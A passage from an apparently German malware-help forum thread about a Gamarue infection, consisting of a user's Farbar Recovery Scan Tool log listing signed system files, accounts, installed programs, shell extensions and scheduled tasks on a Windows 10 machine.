Dateien vorhanden, die an der Verifikation gescheitert sind.) 
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2017-06-18 19:26
==================== Ende von FRST.txt ============================
|
02.07.2017, 20:04 | #3 |
| Windows 10 - Gamarue
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-07-2017
durchgeführt von ararat (02-07-2017 20:58:55)
Gestartet von C:\Users\ararat\Desktop
Windows 10 Pro Version 1703 (X64) (2017-06-08 07:11:14)
Start-Modus: Normal
==========================================================

==================== Konten: =============================
Administrator (S-1-5-21-3349751938-1204465652-1694021483-500 - Administrator - Disabled)
ararat (S-1-5-21-3349751938-1204465652-1694021483-1000 - Administrator - Enabled) => C:\Users\ararat
DefaultAccount (S-1-5-21-3349751938-1204465652-1694021483-503 - Limited - Disabled)
Gast (S-1-5-21-3349751938-1204465652-1694021483-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3349751938-1204465652-1694021483-1002 - Limited - Enabled)

==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
3DStudio Import 18 GER (HKLM\...\063FFF2FFF18FF00FF0201F01F02F000-R1) (Version: 18.0 - Graphisoft) Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated) Adobe Creative Suite 6 Master Collection (HKLM-x32\...\{E8AD3069-9EB7-4BA8-8BFE-83F4E69355C0}) (Version: 6 - Adobe Systems Incorporated) Adobe Flash Player 21 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 21.0.0.213 - Adobe Systems Incorporated) Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated) AmpegSVX (HKLM-x32\...\{CF1D7323-8A0A-49C7-83B0-088DB90721E2}) (Version: 1.1.0 - IK Multimedia) AmpliTube 3 (HKLM-x32\...\{5DD152A8-BFB3-439E-90CD-5C00C2116E23}) (Version: 3.0.1 - IK Multimedia) ArchiCAD 18 GER (HKLM\...\001FFF2FFF18FF00FF0201F01F02F000-R1) (Version: 18.0 - GRAPHISOFT) Autodesk 3ds Max 2015 (HKLM\...\{52B37EC7-D836-0410-0264-3C24BCED2010}) (Version: 17.0.630.0 - Autodesk) Hidden Autodesk 3ds Max 2015 (HKLM\...\Autodesk 3ds Max 2015) (Version: 17.0.630.0 - Autodesk) Autodesk 3ds Max 2015 Populate Data (HKLM\...\{57E92DED-DC6C-41E5-B9E1-76D83BD2EABE}) (Version: 17.0.0.0 - Autodesk) Autodesk Application Manager (HKLM-x32\...\Autodesk Application Manager) (Version: 1.0.59.0 - Autodesk) Autodesk Backburner 2015 (HKLM-x32\...\{8C5F38D2-8EFE-49A4-B3F5-BF3210FED168}) (Version: 15.0.0.0 - Autodesk) Autodesk DirectConnect 2015 64-bit (HKLM\...\{23C9ED7C-CB64-45FE-A7EA-1BA666F5589D}) (Version: 9.0.56.4 - Autodesk) Hidden Autodesk DirectConnect 2015 64-bit (HKLM\...\Autodesk DirectConnect 2015 64-bit) (Version: 9.0.56.4 - Autodesk) Autodesk Inventor Server Engine for 3ds Max 2015 (HKLM\...\{9167CA34-4E48-49E3-8892-3C439739D2D3}) (Version: 17.0 - Autodesk) Autodesk Material Library 2015 (HKLM-x32\...\{427F733F-4D6C-45BC-9324-EB743104C321}) (Version: 5.2.9.100 - 
Autodesk) Autodesk Material Library Base Resolution Image Library 2015 (HKLM-x32\...\{ABE2F70B-8D94-44E9-AA04-F0DB35063D62}) (Version: 5.2.9.100 - Autodesk) Autodesk Material Library Medium Resolution Image Library 2015 (HKLM-x32\...\{9F6466D9-6EFC-4A10-B931-C72D1A3F1763}) (Version: 5.2.9.100 - Autodesk) Autodesk Revit Interoperability for 3ds Max 2015 (HKLM\...\{0BB716E0-1500-0610-0000-097DC2F354DF}) (Version: 15.0.107.0 - Autodesk) Hidden Autodesk Revit Interoperability for 3ds Max 2015 (HKLM\...\Autodesk Revit Interoperability for 3ds Max 2015) (Version: 15.0.107.0 - Autodesk) CodeMeter Runtime Kit v5.10a (HKLM\...\{CADFF08A-A157-474F-B6A8-8F26F81F7ABE}) (Version: 5.10.1224.501 - WIBU-SYSTEMS AG) Dolby Digital Plus Advanced Audio (HKLM\...\{B0BFC63F-EA07-419E-960B-3FB2ED5DD0B2}) (Version: 7.6.3.1 - Dolby Laboratories Inc) Dropbox (HKLM-x32\...\Dropbox) (Version: 29.4.20 - Dropbox, Inc.) Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.59.1 - Dropbox, Inc.) 
Hidden Forest Pack Pro 4.3.6 (HKLM-x32\...\Forest Pack Pro) (Version: 4.3.6 - Itoo Software) Intel Collaborative Processor Performance Control (HKLM-x32\...\0E7DAF70-FB54-4B91-B192-7E771C25AEEB) (Version: 1.0.0.1018 - Intel Corporation) Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.3.1184 - Intel Corporation) Intel(R) Network Connections Drivers (HKLM\...\PROSet) (Version: 20.2 - Intel) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation) Intel(R) Wireless Bluetooth(R)(patch version 17.1.1532.1813) (HKLM\...\{302600C1-6BDF-4FD1-1507-148929CC1385}) (Version: 17.1.1507.0532 - Intel Corporation) Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{f5d71765-7cd1-4e68-998f-5b379e725da3}) (Version: 10.0.22 - Intel(R) Corporation) Hidden Intel® PROSet/Wireless Software (HKLM-x32\...\{185db067-38cd-4521-a43e-c39b96ee1389}) (Version: 19.50.1 - Intel Corporation) Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217051FF}) (Version: 7.0.510 - Oracle) Lenovo Anzeige am Bildschirm (HKLM\...\OnScreenDisplay) (Version: 8.80.10 - Lenovo) Hidden Lenovo Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.67.12.16 - Lenovo) Hidden Lenovo QuickOptimizer (HKLM\...\{8D2C871B-1B9F-45AC-9C43-2BB18089CDFA}) (Version: 1.0.022.00 - Lenovo) Lenovo Settings - Power (HKLM-x32\...\{A6CFC34A-56EE-4AF5-8C49-995F59E6A160}) (Version: 2.00.000 - Lenovo) Hidden Lenovo Solution Center (HKLM\...\{C1FC707B-AE6B-4DC4-89A5-6628A01F8103}) (Version: 3.3.003.00 - Lenovo) Lenovo System Interface Foundation Driver (HKLM\...\{C2E5CA37-C862-4A69-AC6D-24F450A20C16}) (Version: 1.0.078.00 - Lenovo) Lexicon Omega Driver (HKLM\...\{2A837CDD-8FD6-4287-B82E-0664C90BB15A}) (Version: 2.7 - Lexicon) Hidden Lexicon Omega Driver (HKLM-x32\...\Lexicon Omega Driver) (Version: 2.7 - Lexicon) Metric Collection SDK (HKLM-x32\...\{DDAA788F-52E6-44EA-ADB8-92837B11BF26}) (Version: 
1.1.0008.00 - Lenovo Group Limited) Hidden Microsoft OneDrive (HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\OneDriveSetup.exe) (Version: 17.3.6917.0607 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 
Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) NVIDIA 3D Vision Treiber 354.45 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 354.45 - NVIDIA Corporation) NVIDIA Grafiktreiber 354.45 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 354.45 - NVIDIA Corporation) NVIDIA Update 10.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 10.4.0 - NVIDIA Corporation) NVIDIA WMI 2.22.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVWMI) (Version: 2.22.0 - NVIDIA Corporation) OpenOffice 4.1.2 
(HKLM-x32\...\{F5CAB1AF-7B1A-4CEC-B829-A3F699473AE1}) (Version: 4.12.9782 - Apache Software Foundation) PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.21236 - Realtek Semiconductor Corp.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7614 - Realtek Semiconductor Corp.) Rhinoceros 5 (64-bit) (HKLM\...\{141B55B6-73E2-4F3F-9F59-7C477F186311}) (Version: 5.7.31207.07545 - Robert McNeel & Associates) ScummVM 1.8.0 (HKLM-x32\...\ScummVM_is1) (Version: - The ScummVM Team) Skype™ 7.36 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.36.101 - Skype Technologies S.A.) Spotify (HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\Spotify) (Version: 1.0.56.451.gb2f539fc - Spotify AB) SRWare Iron (64-Bit) Version 48.2550.0 (HKLM\...\{BA85A29D-B48E-4826-BAEE-817024E52E29}_is1) (Version: 48.2550.0 - SRWare) Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.17.115 - Synaptics Incorporated) TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH) TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.72365 - TeamViewer) ThinkPad Settings Dependency (HKLM\...\{08515684-CE49-47EF-B509-326A2E91BC5C}_is1) (Version: 3.0.1.29 - Lenovo) Hidden T-RackS 3 Deluxe (HKLM-x32\...\{423C4130-EBC3-410A-B3A0-37BBF9D607D5}) (Version: 1.0.0 - IK Multimedia) V-Ray for 3dsmax 2015 for x64 (HKLM\...\V-Ray for 3dsmax 2015 for x64) (Version: 3.20.03 - Chaos Software Ltd) WibuKey Setup (WibuKey Remove) (HKLM\...\{00060000-0000-1004-8002-0000C06B5161}) (Version: Version 6.20 of 2013-Dec-18 (Build 1230) (Setup) - WIBU-SYSTEMS AG) Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation) WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) 
(Version: 5.31.0 - win.rar GmbH) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) CustomCLSID: HKU\S-1-5-21-3349751938-1204465652-1694021483-1000_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => Keine Datei CustomCLSID: HKU\S-1-5-21-3349751938-1204465652-1694021483-1000_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => Keine Datei CustomCLSID: HKU\S-1-5-21-3349751938-1204465652-1694021483-1000_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => Keine Datei ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) 
ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) 
ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ContextMenuHandlers01: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ContextMenuHandlers01: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-02-04] (Alexander Roshal) ContextMenuHandlers01: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Keine Datei ContextMenuHandlers04: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ContextMenuHandlers05: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) 
ContextMenuHandlers05: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Keine Datei ContextMenuHandlers05: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2016-11-02] (Intel Corporation) ContextMenuHandlers05: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-05-01] (NVIDIA Corporation) ContextMenuHandlers06: [PintoStartScreen] -> {470C0EBD-5D73-4d58-9CED-E91E22E23282} => C:\Windows\System32\appresolver.dll [2017-06-08] (Microsoft Corporation) ContextMenuHandlers06: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-02-04] (Alexander Roshal) ContextMenuHandlers06: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Keine Datei ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) Task: {01D9090E-055B-47E6-9237-48A7AD893313} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe Task: {0348AA56-036B-49BD-ACA5-651D76113425} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG Task: {0B8AB8F7-A8C8-4648-837B-724FD28BB7EB} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {125C8702-F8E9-4607-A69A-827C81E217F3} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-02-23] (Dropbox, Inc.) 
Task: {196313D9-F94B-4EBB-A563-871CC95A244F} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe Task: {20C24C14-DEEC-4084-8BC1-45364FEE0E6C} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe Task: {2193CD8C-D45A-4571-AC73-2AFF7DDDCD65} - System32\Tasks\{D47AB256-778C-4756-BFF4-B5F38C8A441A} => pcalua.exe -a "C:\Program Files\World of Warcraft 1.12.1\WoW.exe" -d "C:\Program Files\World of Warcraft 1.12.1" Task: {233D0047-31A5-40DE-8BC9-FCF166E1E548} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe Task: {25DAF7F8-2048-43D9-9CA3-C335828F4532} - System32\Tasks\{C33EC7F1-7E6C-4635-A9D8-DE9B48C4F5F2} => pcalua.exe -a "C:\Program Files\World of Warcraft 2.4.3\Wow.exe" -d "C:\Program Files\World of Warcraft 2.4.3" Task: {2D27F44F-F282-4720-8EE9-5F2F758217F1} - System32\Tasks\RtHDVBg_LENOVO_MICPKEY => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-10-01] (Realtek Semiconductor) Task: {330E747B-8045-43D9-AE55-D4C6B8254107} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe Task: {38C1E477-9549-4F3A-A622-DB2BE844D3FC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG Task: {38EF41BE-5CD7-4EAC-9C2B-D3C9BF305DBA} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\d7021b40-c8de-4075-8989-d44166534f8a => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-06-05] (Lenovo Group Limited) Task: {3E54759A-7D66-45F1-8D30-B4BDB68BB5F3} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe Task: {40F17ABB-21F3-4E9E-A06F-5CC9526E5080} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe Task: {46AE9F37-C558-4167-B4AA-AC736E9BCF40} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => 
C:\WINDOWS\ehome\ehPrivJob.exe Task: {4C3A42E4-FB4F-40FE-9156-B276AA24C0BF} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe Task: {4F6CC665-D711-4615-BA99-3634BD84A3CB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe Task: {57322CE1-EEEA-49A8-AFDE-2A814B78F3FF} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe Task: {5ADECB7F-4E8A-4A4A-8E48-B1A950E7EDF1} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG Task: {6229F9D6-65C1-4C81-B563-A8A011EE91D8} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe Task: {69ED972F-0507-43E0-B842-4ACC4A4C636A} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe Task: {6B4326C0-4369-475B-9BD7-660E928B9078} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-06-02] (Lenovo) Task: {72F2B2FA-6B40-427A-B40D-AD19949718D5} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe [2016-04-18] (Adobe Systems Incorporated) Task: {7664EED0-BA9C-4AC1-BB8A-BE2EF3716B88} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32 Task: {7CF19C94-4370-4482-8B1C-31D7F80661CA} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {7F1D8057-FE69-4BE5-A7EC-D3EFD6DBEE01} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {82C043EC-E5CC-47E1-9692-0E00D829F248} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated) Task: 
